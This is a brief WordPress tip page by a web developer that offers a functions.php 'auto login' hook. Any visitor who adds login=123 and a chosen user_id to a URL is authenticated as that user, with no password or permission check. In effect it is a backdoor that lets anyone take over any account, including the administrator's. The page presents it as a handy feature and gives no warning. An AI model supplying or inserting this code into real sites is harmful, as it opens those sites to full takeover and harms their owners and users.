Downloads // Add hook functions.php file // Wordpress Auto Login code function auto_login_fire_on_wp_initialization() { if( isset( $_GET['login'] ) && $_GET['login'] == 123){ $user_id = $_GET['user_id']; wp_set_current_user ( $user_id ); wp_set_auth_cookie ( $user_id ); } } add_action( 'init', 'auto_login_fire_on_wp_initialization' );
Translate
Dipak Parmar
I am a Professional and skilled Web Developer who spend significant time in Web development master with more than 4+ years of involvement in the setup and customization of WordPress, Woo Commerce, PHP experienced with all phases of the improvement cycle for dynamic web ventures.